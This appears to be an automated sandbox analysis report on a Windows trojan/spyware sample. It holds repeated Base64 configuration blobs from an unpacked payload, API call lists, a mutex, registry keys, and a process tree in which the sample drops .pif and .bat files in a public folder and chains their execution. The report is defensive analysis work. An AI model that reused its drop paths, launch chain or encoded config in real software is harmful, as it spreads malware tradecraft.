'TR9X/Vnsl+hzM+e5nhNmmlBy1ADQPwc/gSTtlPixb3Jhwl75jute4CIDxmk4rJrn2ZfJVfhckqw51eybBdSs0bb1Tc9P8o5ekPCBgMoloce6BtlYQC0Q5sLMeZ8IZRaZkKfVBvrLcM9M2IMSmWdXXvIsIK3L3jNT1nfIUBA7GEO6NixQDlmyfKlfsUdag5aqdbeeqho6PKokSEx4L1nvXD6ylxZMlj58zon/Q09L34OVhe8bGGG+eZEc8OEP7U9bvmw+2TRmzZqjuGCvO+eWsF3
Source: 4.2.vokleakA.pif.31be4ec6.2.raw.unpack, Settings.cs	Base64 encoded string: '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
Source: 4.2.vokleakA.pif.3305d590.5.raw.unpack, Settings.cs	Base64 encoded string: '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
Source: 4.2.vokleakA.pif.31e40ee8.4.raw.unpack, Settings.cs	Base64 encoded string: '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
Source: 4.2.vokleakA.pif.33006458.6.raw.unpack, Settings.cs	Base64 encoded string: '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

Source: truesight.sys.0.dr	Binary string: \Device\Driver\
Source: truesight.sys.0.dr	Binary string: \Device\TrueSight

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@13/12@2/2

Source: C:\Users\user\Desktop\PCMNil7wkU.exe

Code function: 0_2_04123458 GetLastError,FormatMessageA,

0_2_04123458

Source: C:\Users\user\Desktop\PCMNil7wkU.exe

Code function: 0_2_04108F56 GetDiskFreeSpaceA,

0_2_04108F56

Source: C:\Users\Public\Libraries\vokleakA.pif

Code function: 4_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,task_proc,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,

4_2_004019F0

Source: C:\Users\user\Desktop\PCMNil7wkU.exe

Code function: 0_2_0411EF94 CoCreateInstance,

0_2_0411EF94

Source: C:\Users\user\Desktop\PCMNil7wkU.exe

Code function: 0_2_0411A27C FindResourceA,LoadResource,SizeofResource,LockResource,

0_2_0411A27C

Source: C:\Users\user\Desktop\PCMNil7wkU.exe

File created: C:\Users\Public\Libraries\Akaelkov.PIF

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2504:120:WilError_03
Source: C:\Users\Public\Libraries\vokleakA.pif	Mutant created: \Sessions\1\BaseNamedObjects\jhT6lZT93vW5

Source: C:\Users\user\Desktop\PCMNil7wkU.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\AkaelkovO.bat" "

Source: C:\Users\Public\Libraries\vokleakA.pif	Command line argument: 08A	4_2_00413780
Source: C:\Users\Public\Libraries\vokleakA.pif	Command line argument: 08A	4_2_00413780
Source: C:\Users\Public\Libraries\vokleakA.pif	Command line argument: 08A	4_1_00413780
Source: C:\Users\Public\Libraries\vokleakA.pif	Command line argument: 08A	7_2_00413780
Source: C:\Users\Public\Libraries\vokleakA.pif	Command line argument: 08A	7_2_00413780
Source: C:\Users\Public\Libraries\vokleakA.pif	Command line argument: 08A	7_1_00413780
Source: C:\Users\Public\Libraries\vokleakA.pif	Command line argument: 08A	9_2_00413780
Source: C:\Users\Public\Libraries\vokleakA.pif	Command line argument: 08A	9_2_00413780
Source: C:\Users\Public\Libraries\vokleakA.pif	Command line argument: 08A	9_1_00413780

Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Users\Public\Libraries\vokleakA.pif	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll

Source: C:\Users\user\Desktop\PCMNil7wkU.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: PCMNil7wkU.exe

ReversingLabs: Detection: 26%

Source: C:\Users\user\Desktop\PCMNil7wkU.exe

File read: C:\Users\user\Desktop\PCMNil7wkU.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\PCMNil7wkU.exe C:\Users\user\Desktop\PCMNil7wkU.exe
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\AkaelkovO.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Process created: C:\Users\Public\Libraries\vokleakA.pif C:\Users\Public\Libraries\vokleakA.pif
Source: unknown	Process created: C:\Users\Public\Libraries\Akaelkov.PIF "C:\Users\Public\Libraries\Akaelkov.PIF"
Source: C:\Windows\System32\conhost.exe	Process created: C:\Users\Public\Libraries\vokleakA.pif C:\Users\Public\Libraries\vokleakA.pif
Source: unknown	Process created: C:\Users\Public\Libraries\Akaelkov.PIF "C:\Users\Public\Libraries\Akaelkov.PIF"
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Process created: C:\Users\Public\Libraries\vokleakA.pif C:\Users\Public\Libraries\vokleakA.pif
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\AkaelkovO.bat" "	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Process created: C:\Users\Public\Libraries\vokleakA.pif C:\Users\Public\Libraries\vokleakA.pif	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Process created: C:\Users\Public\Libraries\vokleakA.pif C:\Users\Public\Libraries\vokleakA.pif	Jump to behavior
